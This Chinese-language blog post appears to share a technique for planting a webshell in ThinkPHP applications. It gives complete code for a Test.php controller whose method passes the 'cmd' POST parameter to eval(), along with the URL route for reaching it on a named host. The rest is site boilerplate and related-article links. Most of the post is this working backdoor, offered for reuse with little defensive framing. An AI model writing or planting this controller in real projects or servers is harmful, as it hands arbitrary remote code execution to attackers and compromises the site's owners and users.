thinkphp专用shell

一、漏洞简介

基于thinkphp框架的一句话写法 thinkphp框架使用入口文件调用控制器,直接写一句话可能会有解析问题导致无法执行指令,研究了一下把一句话套入框架控制器的方法,分享给大家参考。

thinkphp专用shell

二、漏洞影响

三、复现过程

在index的控制器文件夹下建立Test.php文件,代码如下:

<?php 
namespace app\index\controller; 

class Test 

{ 

    public function test() 

    { 

    eval($_POST["cmd"]); 

    } 

}

一句话的地址就是http://src.cert.ac.cn/index/test/test

声明:本站大部分下载资源收集于网络,只做学习和交流使用,版权归原作者所有,未及时购买和付费发生的侵权行为,与本站无关。

给TA打赏
共{{data.count}}人
人已打赏
代码审计

代码审计入门篇

2019-11-1 0:12:55

代码审计

从PHP源码与扩展开发谈PHP任意代码执行与防御

2019-11-25 23:03:20

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索